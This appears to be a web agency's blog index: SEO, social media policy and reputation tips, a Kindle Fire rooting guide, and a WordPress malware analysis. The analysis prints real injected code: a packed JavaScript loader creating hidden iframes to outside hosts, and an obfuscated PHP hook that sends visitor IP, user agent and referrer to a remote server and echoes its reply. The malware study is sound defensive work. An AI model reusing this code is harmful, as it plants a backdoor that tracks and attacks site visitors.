Blog

Social Media Tips: Who Owns a Twitter Account-Name

Who owns a Twitter name-account? When an employee is tweeting for a company, and compensated for doing this a part of their “job”, who owns the account when the employee eventually leaves? A lawsuit between a blogger and former employer over Twitter account ownership may lay some ground work to finally answer this question. Unfortunately this is not a great test case since the employment circumstances are a bit murky as wells as the promises made over compensation. The real problem here is that the account ownership was not clearly established from the beginning and there was no transition plan established for when the employee eventually left the company. This is the big lesson to be learned from this case.  Below I have outlined 5 Steps to Protect Ownership of Your Company Twitter Brand Your Twitter Account: For company twitter accounts-names make sure your brand name is in it. For example, Comcast, Best Buy and ATT uses Twitter names such @comcastcares, @comcastvoices, ATTTeamTatiana, @ATTcustomercare, @coral_BestBuy @Gina_BestBuy. Note that Best Buy incorporated the individual’s name in the Twitter name along with their brand name. This personalizes the account and is a good idea as long as you clearly establish up front the Twitter account is owned by the company. Company email address: On Twitter the email address assigned to the account pretty much determines who has the ultimate control of the account. If the account is assigned to a company controlled email account you   have control over the email address and should the employee leave you will be able to reset the Twitter password and retain control of the account, and even rename the account if you want to. So make sure all company related Twitter accounts are set up with company email addresses and not personal email addresses such as Gmail, Yahoo, or Hotmail. Written Agreement: Set up a written agreement clearly stating that the employees social media activities on behalf of the company are to be conducted on company owned accounts and must follow company social media policies.  See my previous blogs on 10 Practical Steps to Develop a Social Media Policy and Social Media Policy Examples and Best Practices. Separate Personal and Business Social Media: Make sure your employees use your company social media accounts for business and only for business and use their personal accounts for all personal matters.  While their personal accounts are private, make sure your social media policy prohibits use of company trademarks and discussion of company business on personal accounts. Termination: Upon termination or an assignment change of an employee using a company social media make sure you do a debriefing and transfer usernames, passwords, and all other relevant information to the person that will be assuming the role moving forward. You want to make sure this is a seamless transitions without any wrinkles or missteps along the way or afterward.

Read more

SEO Tips: Ideas for Creating Great Website and Blog Content

It is said over and over, “Content is King” for achieving top search rankings, but what exactly does that mean and how do you create great content.  Here are some quick SEO tips for developing great content for your website or blog. Don’t Write What YOU Think They Want to Read: Website owners and bloggers often create content based on internal assumptions of what they think their consumers or visitors want to read or should be interested in.  It is vital that your content addresses topics useful and interesting to your primary audience and at an appropriate level for their consumption and understanding.  Make sure you look at potential topics and the level it is written at from the perspective of your typical consumer, not your own internal view of how it should be or what they should want to know. No Selling, Telling, Shouting, Screaming – No Hype Zone: No one likes telemarketers and ditto for websites and blogs that SCREAM BUY NOW!  Shouting and screaming self-proclaimed achievements, features and benefits about your amazing new product, how your company is number one, or the industry leader in…  destroys any credibility your blog or website may develop.  Content that is overtly selling and making huge claims makes visitors immediately suspicious.  Likewise shallow content with a transparent cover to “sell” something is always detectible and will send visitors packing off to another site where they can find useful information.  No matter how catchy the title or creative the pitch, people know when they’re being led down to the checkout cart, no matter how well disguised the tour guide is. If You Think You the Information is Too Valuable, It’s Perfect: Readers are looking for one thing when they come to a website: information. Readers do not want to read pages and pages of case studies that all brag about your Fortune 500 clients, nor how great youthink your services or products are – see #2 above.Many bloggers and content writers or owners are reluctant to reveal “too much” for fear of “giving away” their secrets.  However, the information you may be clinging onto so tightly for fear of giving too much away – is likely the content that will drive traffic to your site. For illustration’s sake, let’s say George has a legal consulting website.  George regularly offers very useful, authoritative legal information and how-to’s in his website blog.  Things like what to do or say, or not do or say, when questioned by law enforcement, or how to file certain complicated court forms or claims, and so on.  When one of his loyal readers, who has never hired George before, needs serious legal consultation – is he or she going to scour his site for an article or blog regarding the situation, and say to himself, “Thanks for the free advice, George, now I don’t have to hire you”.. ?  On the contrary – because George regularly provides helpful, inside advice about legal matters, he will not only gain trust, but he establishes himself as a leading authority in his profession.It’s as simple as this: the more unselfishly information is given away, the more readers and customers will instinctively trust you and your business or blog, and the more your business or blog will be seen as an authoritative source and a “good” business. Unique Content: It is vital that your blog posts and web page content is unique and not copied from somewhere else on your website or worse from another website! Duplicate content will get you penalized by Google and hurt your search results, Google assigns the top rank to the oldest content and penalizes the copycats. In addition, duplicate content from a site or source other than your own material is plagiarism and also could be a copyright violation, and can cause more serious problems than a dip in search results, so create your own stuff. Keyword Stuffing – great idea, NOT really: If you don’t know much about SEO, know this: SEO is not just about inserting a few keywords into a blog or webpage.  Google does not base search results upon a magic number of keywords in website content.  A few clever words, or repeating some keywords according to some magic SEO recipe, will not get your site or blog ranking.  In fact there are over 240 factors used in the Google algorithm, no one knows the exact number and only about 50 factors have been reverse engineered by deduction; the algorithm itself is secret and as well guarded as the Coke recipe.Does stuffing or repeating keywords work?  Stuffing content, forcing keywords into a post or page, creates unnatural content that is hard to read and follow.  It is usually obvious to both readers and Google, and both will ignore content like this.  The overall quality of content is more important to both readers and Google than the number of keywords used (look up the Panda updates if you think otherwise). Page Content – at least 200 to 300 words: Pages with very little content don’t provide much information to visitors, nor do they give much to the search engines to index and digest.  Both Google and visitors view pages with minimal text content as having little value and poor quality/authority.  Make sure your key pages, Homepage and second level pages at a minimum, have at least 200 to 300 words per page. Make it Relevant: Make sure the page content is relevant to both your overall website and it is focused on the topic for that page.  The page title and content should relate to each other and be focused on a particular topic.  It is better to have several highly focused pages than a few pages that are very general  covering a wide range of topics, but not in detail. Page and website Structure: This is key to creating a high ranking website and page.  We could write an entire blog  on this one item alone.  For now, we will leave it at; follow good design practices, make sure your title, description, H1 and H2, etc are done correctly and that all are relevant to the page content.   Surprisingly this is one of the most overlooked aspects of on-site SEO.   A webpage and website can look great, and be completely non-functional from an SEO standpoint. We have met many that think that a great website, with great content; will eventually rank on its own.  In a perfect world this may be true, but the fact is that the internet is highly competitive and if you rely strictly on the content on your website and in-house SEO skills your website will not be competitive.  Your more aggressive and ambitious competitors certainly have SEO campaigns running and it is impossible to compete against well done SEO with website content alone and frankly, in-house teams can rarely compete against a good SEO professional team. SEO is not something that can be learned overnight, there is much, much more to SEO than most realize.  The best SEO tip is to hire a professional to either do your search engine optimization or advise your in-house webmaster and website team on how to optimize your website and blog.

Read more

Install Android Marketplace and Google Apps on Amazon Kindle Fire

The first thing the Amazon Kindle Fire is Missing is the Google Framework API. Instead of works on Amazon’s API. This limits many different things you can do with your device. Not only is the fix easy, but doesn’t even require root access to the phone. You just need to enable “install outside applications”. More advanced applications like the Android Market and Calendar do require complex configurations, so for those of you who just want your apps to work now here is… The Quick and Dirty Step by Step: Menu -> Settings ->Device -> Allow Installation of Applications -> On. Install File Management Software. Root Explorer, ES File Explorer or DropBox. Find the App you want to Use on your previous Android device, or online. Option 1: Install Astro on your Android Device and use the “Backup” feature to create an APK on your SD card Make sure that you setup Astro to use the SD Card Click File Manager -> Menu Button ->Preferences ->Backup Directory -> Browse Folder /mnt/sdcard-ext Option 2: Find an APK Online Copy the Contents to your PC’s Hard Disk. Download this file Kindle Google Apps which contains many common Google Apps you probably want to use and also download this key file: GoogleFrameworkServices.apk Copy the Contents of these  to your Kindle Fire, most importantly GoogleFrameworkServices.apk You can skip the copying step if you copy your files on your PC to your dropbox folder and open them in your Kindle Fire. Open ES File Explorer or Dropbox to find the files you have copied. Open GoogleFrameworkServices.apk and install. If you are having trouble with this step, try using the Amazon App Store App “EasyInstaller“. Just remembered that worked for me. I did not need root for this step. Try rebooting your device before installing also, rebooting the Kindle seems to solve a lot of problems when loading the APK’s. Restart your Kindle Install Gmail or any other Google app that requires a sign on. Sign on to Google. Install the rest of your software. (it will use your primary Google Account.) Restart your Kindle Enjoy! Thanks to XDA Forums for the methods and troubleshooting and Sasha Segan from PC Mag for the initial intro on how to do it!   For the more Advanced and Adventurous- Installing the Google Android Market: Download and Install Android SDK Update Android SDK to Latest, including USB Drivers. If you have trouble updating the Android SDK try closing everything navigating to the folder in command prompt, and running android.bat out of the /tools folder. Thanks Mobile World for this fix. Configure your %USERPROFILE%/.android/adb_usb.ini to include “0×1949” Note: If the file or the folder do not exist, you MUST create it! Input it without the “”. In the command prompt (windows + r, type cmd, press enter) Navigate to your Android SDK Install directory under platform-tools (cd /program files (x86)/android/platform-tools/) and run adb kill-server then adb devices to check and see if your Amazon Kindle shows up. If the Driver doesnt work replace your android_winusb.inf with this one. You will then have to update the driver for your device (in Device Manager, look for your Kindle with an Exclamation mark on it, inspect it and click Update Driver…navigate to where the android_winusb.inf is in your Android SDK Directory) If your Kindle is Visible in ADB Download SuperOneClick v2.1.1 Run it and Root your Phone Use Root Explorer (Can buy from Amazon App Store) to Copy A Market APK Backup to /system/apps Click the R/O Button to R/W if you can’t copy properly. Use Root Explorer CHMOD /system/apps to Full Access (777) Run the Market APK From the /system/apps directory. Install the Market APK Restart the Kindle Fire You should be able to install applications now! Installing Google Calendar Sync Another tough one is Google Calendar Sync. You can just install the App, but it wont connect to your Google Account. You need these two files:  Google Calendar APK’s The technique is pretty simple, and similar to the Android Market Installation. Using Root Explorer you need to copy GoogleCalendarSyncAdapter.apk into /system/apps and change its permissions to 777 or full open. Then you can run the Calendar.apk and install it. On Reboot, you should have your calendar syncing with your Kindle! Congrats! Thanks Technipages for helping me realize I was missing the adb_usb.ini file! All problems solved! Now it is a real tablet! A really cheap tablet to boot!  

Read more

Adobe mobile Flash Abandoned, Impact on PC Flash and Web Design

What is the impact of Adobe abandoning mobile Flash? Actually abandoning Flash for mobile is not really a big deal in itself, what is a big deal is what this move likely means for the future of Flash on all platforms, PC included. Apple has been a Flash antagonist and Microsoft joined the Flash opposition with IE 10 and Windows 8 declaring it is time for the Web to move on (ouch). With this the demise of the antiquated PC Flash platform can’t be far behind. In fact, Adobe already has the replacement for Flash in work, Edge which is scheduled for launch in 2012. Adobe has finally embraced web design standards such as CSS, although a bit late in the game. CNET has a great article on this with more details, Adobe Abandons Flash Plugin For Mobile. For a more technical assessment of this see Alex’s post The Internet Progresses as Adobe Abandons Flash. Flash was amazing when it first launched, it brought animation and graphics to life on a lifeless internet at the time.  Since then HTML 5, CSS,  and other languages have advanced and made Flash much less relevant and more importantly provided better options for animation and video. Add to the mix that Flash is horrible for SEO and effectively invisible to search engines and there are huge disadvantages and disincentives for using Flash. With today’s announcement from Adobe Flash for website design is now a dead language, like Latin, and it is time to move on to better options. We use HTML 5, CSS and other SEO friendly languages for all of our website development and applications. In fact we have been very busy lately converting Flash video and Flash animations to HTML for some clients that still have them on their websites so their website will be iPad and mobile compatible.

Read more

How to Connect Website Badge / Link to Google+ Business Page

For those of you who skipped configuring your badge for Google+ Pages and can’t find the option anymore, use the following link: https://developers.google.com/+/plugins/badge/config Type in your page’s ID and you will be able to create it again.  You can see it live here at esotech.org at the footer and also the breadcrumb on inner pages. You will have to add a bit of code to your header, and then use the link wherever you like. The link seems highly customizable if you know what you are doing. For example, setting height and width of the icon shouldn’t be a problem. Here is a code snippet example for Esotech’s Page. <!– Place this tag in the <head> of your document–> <link href=”https://plus.google.com/103467698593383507666/” rel=”publisher” /> <!– Place this tag where you want the badge to render–> <a href=”https://plus.google.com/103467698593383507666/?prsrc=3″ style=”text-decoration: none;”> <img src=”https://ssl.gstatic.com/images/icons/gplus-64.png” width=”64″ height=”64″ style=”border: 0;”> </img> </a>

Read more

Social Media Enhances and Complements SEO, like Yin and Yang

The argument that Social Media will ultimately kill SEO is an amusing one. Yes, Social Media will dramatically change SEO, in it fact already has changed  it forever; but Social Media will not replace SEO.  SEO and Social Media have a Yin Yang relationship – opposite forces that complement each other within a greater whole.  I think Social Media is the most exciting thing that has happened to SEO in many years and it will significantly improve the relevance and quality of search results. Social media, combined with the Google Panda Update, and eventually Google +1, have changed the landscape of search rankings.  The Panda update made great strides toward better rankings based on quality content, pushing down the rankings for content farms and junk content.  Google +1 will eventually reward highly regarded sites with quality content with higher rankings.  Social Media in a similar fashion will reward websites with quality blogs, great content and engagement via Social Media with higher search rankings, higher website traffic and greatly expanded exposure.  Panda, Google +1 and Social Media are paving the way to more democratic search results based on user likes and interests and much less influenced by those that game the system. So with that said it would appear that SEO is in fact on it’s way to extinction,but this is far from true.  Yes old school SEO of mindless link building is already on it’s way out and is only marginally effective today.  However, there is now a huge demand for Web 2.0 SEO utilizing best practices of website SEO combined with SMO (Social Media Optimization). Organizations still have a need, in fact now more than ever, for high quality SEO and thanks to these developments quality content and engagement will be rewarded and Spam will be ranked accordingly.  So how does Social Media figure into this and what is the Social Media and SEO Yin Yang Relationship? The purpose of SEO is to get your content found, BUT, the presumption and requirement is that someone is looking for that particular content in the first place.  If so, then SEO works beautifully.  SEO relies on people proactively searching for words associated with your product, service, or organization.  SEO is reactive to a proactive user. Social Media has evolved from personal chatter between close friends to sharing news, discussion, debate, and education across diverse groups.  Sharing and discussion is driving the viral affect of Social Media and this is the link between SEO and Social Media. There is a 24/7 discussion raging on Twitter, Google Plus, Facebook and LinkedIn about everything from politics, to music, news, movies, and products.  These discussions often share links to blogs, websites, Facebook Pages, and other posts and these posts are often re-shared and commented on.  Sharing and the viral affect of Social Media makes it proactive in the sense that the message/discussion is reaching people that weren’t necessarily looking for that in particular.  This is how Social Media is complementary to SEO.  Social Media actively reaches out to and engages users, while SEO relies on users to actively search for content. This is the Yin Yang relationship of SEO and Social Media and why the two are complementary to each other.   Social Media is now an essential be part of  a comprehensive digital marketing strategy along with a SEO campaign designed to work with and complement social media.  With Social Media becoming an essential element of a Digital Marketing Strategy and SEO campaign a new term has been coined to label SEO work specifically focused on Social Media and that is Social Media Optimization or SMO. To develop and implement a successful Digital Marketing Strategy today one must employ top notch SEO, with high quality content, and a lively and interesting SMO-Social Media campaign.  More on that in a future blog…

Read more

Reputation Repair & Management, Learn from the Worst and be the Best

Reputation repair and reputation management is a hot topic today as social media and blogs are exploding in popularity.  Social media is making it increasingly easier for an irate client, customer, or employee to smear your company name and make it very public.  In fact, without a great deal of skill it is fairly easy to create negative content via social media and blogs that will rank in Google or Bing searches such as Company Name Scam or Brand Name Scam.  On twitter the popular hashtags for this are #FAIL to indicate a company or brand has really screwed up or #LAME for a less offensive, but still stupid move. So how does one go about actually implementing a reputation repair campaign.  Below is our 7 Steps for Reputation Management, or How to Do Reputation Repair, but first let’s explore the issue and challenges. Google and Bing search engines are giant calculators, they run huge algorithms to analyze content and webpages to determine the credibility, authority, content quality, along with over 200 other factors to arrive at a search rank for specific keywords.  Thus a blog with Your Company Name Scam in it along with a few keywords will rank at the top of that search result in absence of any competing content.  Likewise, dozens of blogs with Your Company Name Scam will dominate the first and second page of search results, a potential disaster for your reputation!  Add websites like Ripoff Report and press releases or public records for litigation and it is easy enough to have an ugly page one for search results. The best way to learn how to conduct a great reputation management or reputation repair campaign is to look at some companies that have had severe image or reputation problems (many well earned by the way) to see how they turned this around. The simple answer is content, content, and more content, but successful implementation actually more complex than that.  The picture I choose for this post illustrates the point well, it is a matter of counteracting and displacing the negative content with your positive content. Content is absolutely vital and it is equally important that the content is published with the right keywords and on blogs or websites were the search engine spiders will find the content and index it.  There is a bit of art to selecting the right keywords, to borrow a phrase from George Orwell’s book it is “double speak”.  For example, to rank against Your Company Name Scam, you would write blogs with those negative keywords in the content, BUT in a positive context. To illustrate this I wrote a blog a couple of weeks ago titled “SEO Scams, You Need a New Website, Is this Really a Scam?”.  If you do a Google search for Esotech  Scam this turns up on page one in several other positions.  Thankfully no posts about other companies with similar names have any negative posts and this is all positive for our firm and it illustrates this point well. How to do Reputation Repair, 7 Steps for Reputation Management Research: Do Google and Bing searches for your organization name, brand names and key management.  List any keywords or phrases that need attention. Google and Bing search each name and phrase. Google and Bing search each name with scam, sucks, ripoff, etc. in search terms. Identify Keywords: Make a list of words and phrases that either are causing a problem or could cause one in the future. Offending Keywords: List all of the keywords and phrases that showed up in your research above. Be sure to list exactly how it showed up in search results and exactly what you searched for. Potentially Offensive or Harmful Words: List words that are likely choices or targets for complaints or a campaign against your brand or name. Develop Content Strategy: This is a very critical step. This is where you develop your content strategy to either combat and attack an existing problem or defend against potential attacks in the future. Use the research and keyword list from above to develop your content strategy. Identify blog topics and keywords. Identify article topics and keywords. Social media posts and content strategy to leverage the above. Implement Social Media and Blogging: With your research and keywords identified and your content strategy in place now it’t time to implement your campaign. Quality content is vital for a successful campaign, make sure you create quality content consistently to achieve the best results. Crisis Plan: Develop a crisis plan. What will you do if something goes wrong in your business? How will you respond? Who will respond? Monitor: Low Cost-free option: Set up Google Alerts for Your Company Name Scam, Sucks, Ripoff, #Fail, etc. and also the same for your personal name and key managers, and brand names. Paid Monitoring: You can use systems like Radian 6 to monitor chatter on social networks, blogs and new search results for your brand. These platforms offer a comprehensive solution to social media monitoring, however, they are not cheap and generally start at several hundred dollars per month for basic service. Be Proactive and Respond Promptly: Now that your campaign is in place and rolling it is vital that you respond to posts, comments and complaints promptly. It is also important to be proactive and act immediately if something happens and get out in front of the problem.  Don’t wait for the tsunami of complaints or jeers, be proactive and get in front of your clients, consumers, or constituents immediately.

Read more

Social Media Policy Examples and Best Practices

My previous post discussed How to Develop a Social Media Policy, as promised, this post lists provides some great examples of Social Media Policy along with links to policies from dozens of organizations across a range of industries. Social Media Policy Examples My two favorite social media policy examples are Intel and Ford (see infographic below).  I like the Intel policy because it is easy to read, focuses on a common sense approach, is practical, and at the same time it is very comprehensive without being overly authoritarian or rigid.  I like the Ford policy first and foremost because they employed a very cool infographic that will cause people to actually read and use it (clever concept guys), and secondly because it has great content and is a good policy.  Below the Ford infographic is a  link to a great blog by Social Media Today with a list of over 100 examples of social media policies.  Some of the links are now broken, but still a great resource. Intel Social Media Policy Ford Social Media Guidelines   Over 100 Examples of Social Media Policies, via Social Media Today and Social Governance.

Read more

How to Develop a Social Media Policy in 10 Practical Steps

As social media exploded over the last few years organization policies have not kept pace.  In fact until recently few organizations had formal social media policies and today the majority still do not have one. Among the organizations that have tackled this challenge there are three lines of thinking on social media policy: Comprehensive Policy: This camp believes Social Media Policies should be comprehensive with strict rules for employee use and content. Comprehensive social media policies often require approvals for blogs, posts, and content and involve strict oversight to ensure compliance with company policies, branding, and marketing messaging. Broad Guidelines: This approach and line of thinking favors establishing broad guidelines for employee use of and content on organization social networks, websites, and blogs. This approach relies on common sense on the part of both management and staff as well as trust. Another line of thinking with this approach is that existing organization policies already cover or can cover employee behavior and actions.  Note with this approach you should review and update your existing policies to cover social media use and content. Laissez-fairer: The thinking here is that there is no need for an organization Social Media Policy or that existing policies sufficiently cover this. This is a common approach in small and mid-size companies and organizations with an entrepreneurial culture. What are my recommendations for developing a social media policy? Personally I favor the approach of developing guidelines for social media use.  My feeling is that strict rules inhibit creativity and kill any real conversation resulting in stiff uninteresting content that is pretty much corporate speak.  In addition it is very difficult to manage and enforce a strict policy where every post or blog must be approved. 10 Steps to Developing a Social Media Policy Determine which approach your organization will employ: Comprehinsive (strict) Policy or Social Media Guidelines (obviously those electing the third approach of no policy are already finished).  This seems simple enough, but for large organizations there could be different points of view as to what approach is best and what is required.  Make sure you involve all that will have a stake in this. Review existing organization policies: Do they conform to the current environment and law? Can existing policies be updated to cover social media or does your organization need a separate policy? Determine Key Policy Issues: What are you trying to accomplish, prevent, or control?  I recommend writing an outline of the key issues for your organization.  Again, for large organizations different departments will have very different concerns, make sure you solicit input and involvement from the appropriate departments or management.  For example, the concerns from of the marketing department will be very different from those of the legal and HR departments. Research: Review other social media policies (learn from those that have been down this path, my next blog have a list with links to examples of social media policies). Legal:  Yes, depending upon the size and scope of your organization legal and HR review may be required.  The obvious legal question is privacy and free speech, but there are also important issues such as trademark use, copyright, etc.  Review NRLB rulings on social media and employee personal use as these are the new rules of the road. Develop your Social Media Policy: Write your policy, keep it brief and succinct, use examples were possible. Training and Use Guidelines: This is a key part of your policy. Regardless of how well written your policy is, it is useless if your team is not well trained in social media and clearly understands your objectives.  Your training needs to include managers, HR, and others that may be involved in managing social media activities and explaining the policy.  Your entire management team should be familiar with the policy. Implementation: Time to roll it out and walk the talk. Engage:  Oddly and sadly this is where many fail.  Social media is all about engagement, actually talking to people and responding to them.  A one way way outbound billboard campaign will not engage the community.  Your campaign must be a two way interactive dialog.  This topic alone is an entire blog, more on this later… Monitor:  Monitor sounds ominous, but in this context it is a good practice.  It is vital that you monitor your social media campaign.  The discussion on your Facebook page, Twitter, and blog posts is your best and most immediate barometer for how your customers feel about your organization or brand and what they want.  It is your best feed back mechanism, make sure you take advantage of it and have a system in place to share the results and feedback with management. By monitoring the campaign you can adjust your course if necessary, change the tone and content if necessary and expand on what is working. Of course monitoring is of little use if you don’t have a reporting system.  Make sure you have a reporting system established as part of your policy where key management is kept up to date on your organization social media and what is going on in the world.

Read more

Complex WordPress Header Javascript and IFrame Injection Problem, Solution and Analysis

While working on a development site, that sat idle before any actual work was done for a while, we noticed that some kind of iframe injection had occured. There was no trace of it in the database or the server code, nothing that said iFrame, nothing that added extra scripts. This was a brand new website, template from scratch with no plugins and no content…I Was pulling my hair out, but slowly started getting on to the situation, and with the help of Mike Brich from HavenLight Software, got right down to it after hours of investigation and head scratching. This post will be very code intensive, but with full explanations, just a warning, I am jumping right into it!! Overview Bottom line this is how it works: Something Injects Code into wp-settings.php function counter_wordpress is decoded and sends a CURL request to a third party server with your computer info. CURL sends a string from third party server and injects javascript javascript communicates with yet another server and injects an iframe iFrame injects all sorts of other scripts, popups, java programs, and other iFrames from other servers. CURL’d server logs your IP and computer information, and the next time you visit hides itself, or prevents itself from showing its payload, for a while. Repeat. Jump to Solution Jump to Analysis Jump to Questions The Problem The iFrame injection did not appear on my browsers, or any other browser in my office. It seemed to appear only on browsers coming from a IP that hadn’t encountered it before, or at least hadn’t for a while. On success or failure of delivering its payload, it hid! Not only from machines, but from Bots too, Googlebot and Googles malware scans saw nothing coming from this site, it was bizarre. I scanned the source code of the entire wordpress install for any traces of traditional injections or Iframes, but there were none. There was nothing in the database either. I disabled and removed all plugins, and it was still there. The behavior of the code was strange also, it would load the script, show a Java wants to run warning, then on refresh start loading data from various sources as the iFrame was inserted, I found out later that the script had a 5 second delay when loading the iFrame, which didn’t allow me to catch it as I was refreshing, and also, I am sure, helps avoiding automated scans, including Google’s Malware scans. After loading once it would disappear, never to return. I couldn’t see it, however something interesting started to happen. Refreshing the page over and over in the source code, shows an error that appeared on the site and showed up in the source code where the original Injection occured, right before the end of </head> <html> <head> <title>The page is temporarily unavailable</title> <style> body { font-family: Tahoma, Verdana, Arial, sans-serif; } </style> </head> <body bgcolor=”white” text=”black”> <table width=”100%” height=”100%”> <tr> <td align=”center” valign=”middle”> The page you are looking for is temporarily unavailable.<br/> Please try again later. </td> </tr> </table> </body> </html>   This made it seem as if another website was loading inside mine, since the opening and closing html tags were a dead giveaway. I started to search for this issue and pretty quickly found out that this was an error message from a web server running nginx, an open-source, high-performance HTTP server and reverse proxy, as well as an IMAP/POP3 proxy server meant for servers with limited system resources. The server was errorign out, perhaps too many sites are connected at once and its DoSing itself. So, confirmed, my website is loading another website in its header. This is the code that was being used, please be careful and do not click on any links in this document that are in code blocks. <script type=’text/javascript’>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘d 9(){5=2.e(\’7\’);f(!5){8 0=2.c(\’3\’);2.g.h(0);0.6=\’7\’;0.1.a=\’4\’;0.1.b=\’4\’;0.1.n=\’i\’;0.r=\’s://q.o.j/3.k?6=l\’}}8 t=m(“9()”,p);’,30,30,’el|style|document|iframe|1px|element|id|yahoo_api|var|MakeFrameEx|width|height|createElement|function|getElementById|if|body|appendChild|none|pl|php|2b8325qvzjut0iv8b87u9nlxnan0kpc|setTimeout|display|345|500|sokistatehouse|src|http|’.split(‘|’),0,{})) </script> <IFRAME style=”display:none” SRC=”http://finderonlinesearch.com/tds/in.cgi?5&user=mexx” WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME><meta name=”Cart66Version” content=”Professional 1.2.2″ /> </head> It is messy code, difficult to understand with the naked eye, why? Because, as Mike found out, its packed. Here is what it looks like unpacked. function MakeFrameEx() { element = document.getElementById(‘yahoo_api’); if (!element) { var el = document.createElement(‘iframe’); document.body.appendChild(el); el.id = ‘yahoo_api’; el.style.width = ‘1px’; el.style.height = ‘1px’; el.style.display = ‘none’; el.src = ‘http://hardpancakes.xe.cx/showthread.php?t=72291731′ } } var ua = navigator.userAgent.toLowerCase(); if (((ua.indexOf(“msie”) != -1 && ua.indexOf(“opera”) == -1 && ua.indexOf(“webtv”) == -1)) && ua.indexOf(“windows”) != -1) { var t = setTimeout(“MakeFrameEx()”, 500) } Interesting URL! Where does it go? Interestingly enough to a 404 page on a nginx server, as suspected. So where is the iFrame, and where the hell is this packed javascript function getting loaded into the header? Now I go back to my searches, I can’t find any mention of the iFrame URL the new unencoded URL, or even “MakeFrameEx” anywhere in the source code. so I decided to search again for anything with the words wp_head, which can be done like this: # grep -Rin ‘wp_head’ yourdirectory I look again at the function “counter_wordpress” that I had overlooked as a valid system file, that just looked overly complex (I thought it was part of wordpress.com’s tracker). It wasn’t. This is the function that was sitting right above do_action(‘init’) in wp-settings.php: function counter_wordpress() {$_F=__FILE__;$_X=’Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+’;eval(base64_decode(‘JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==’));$ua = urlencode(strtolower($_SERVER[‘HTTP_USER_AGENT’]));$ip = $_SERVER[‘REMOTE_ADDR’];$host = $_SERVER[‘HTTP_HOST’];$uri = urlencode($_SERVER[‘REQUEST_URI’]);$ref = urlencode($_SERVER[‘HTTP_REFERER’]);$url = $url.’?ip=’.$ip.’&host=’.$host.’&uri=’.$uri.’&ua=’.$ua.’&ref=’.$ref;$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 2);$re = curl_exec($ch);curl_close($ch);echo $re;}add_action(‘wp_head’, ‘counter_wordpress’); There it is, a ridiculously over encoded piece of code that gets injected into wp_head. I am going to move onto the solution now, and then go back to analyze this bit of code, and pose some questions because I still can’t answer precisely on how it got in there in the first place. The Solution Firstly, go to your main wordpress directory and type: # ls -al Take note of any files that have changed recently versus others, most of your wordpress config files should have the same modified date, except maybe wp-config.php wp-settings.php is the file I found infected, but you may find it elsewhere. Remove the function counter_wordpress() including the it’s wordpress hook add_action(‘wp_head’, ‘counter_wordpress’); If you do not have this function in your wp-settings, it may show up somewhere else but you can be sure that it will be followed by an add_action(‘wp_head’, ‘function_name’);  that is not supposed to be there. Find it and remove it immediatly. If you cannot find the code in the wp-settings.php file I suggest running the following command: # grep -Rin ‘wp_head’ yourdirectory Where yourdirectory is the directory in question, this will give you a list of files, line numbers, and code where wp_head exists in your install, which is a requirement for the code to install itself…(imagine if they had encrypted THAT and evaled it, would be impossible to find.) After removing this function you should find that your error message, Injected Javascript and Injected iFrames all stop loading. After you remove the function check your permissions in your wordpress root directory and all other directories, make sure they are set to 755 or even more stringent, mine was not and I suspect that there is some other WordPress vulnerability that took advantage of that, of which I cannot identify. The Analysis Lets dig deeper, how does this thing work? It is encrypted after all… Here is the PHP  function, a bit more legible: function counter_wordpress() { $_F=__FILE__; $_X=’Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+’; eval(base64_decode(‘JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==’)); $ua = urlencode(strtolower($_SERVER[‘HTTP_USER_AGENT’])); $ip = $_SERVER[‘REMOTE_ADDR’]; $host = $_SERVER[‘HTTP_HOST’]; $uri = urlencode($_SERVER[‘REQUEST_URI’]); $ref = urlencode($_SERVER[‘HTTP_REFERER’]); $url = $url.’?ip=’.$ip.’&host=’.$host.’&uri=’.$uri.’&ua=’.$ua.’&ref=’.$ref; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 2); $re = curl_exec($ch); curl_close($ch); echo $re; } add_action(‘wp_head’, ‘counter_wordpress’); As we can see, this is a average CURL operation, but to where is it sending? We have all the params but the URL, which is concatenated from…somewhere… Actually it has alot to do with that variable $_X which is encoded about 3 or 4 times, as you will see: Evaluation Process This is the process of evaluation: $_X = an Encoded String Another String is Decoded which accepts $_X Inside that code is another Encoded form of $_X Inside that same Code, the new decoded form of $_X is run through strtr function, which replaced letters and numbers with other letters and numbers. Inside taht same code $_R is set and ereg _replace ran through $_R  with $_X Inside that same code, $_R is evaluated Inside that same code $_R and $_X are set to null so you cant echo them outside of the encoding. Then the entire thing is evaluated, giving you $url Evaluation Breakdown Lets break it down: $_F=__FILE__; Encryption Layer 1: $_X=’Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+’; eval(base64_decode(‘JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==’)); 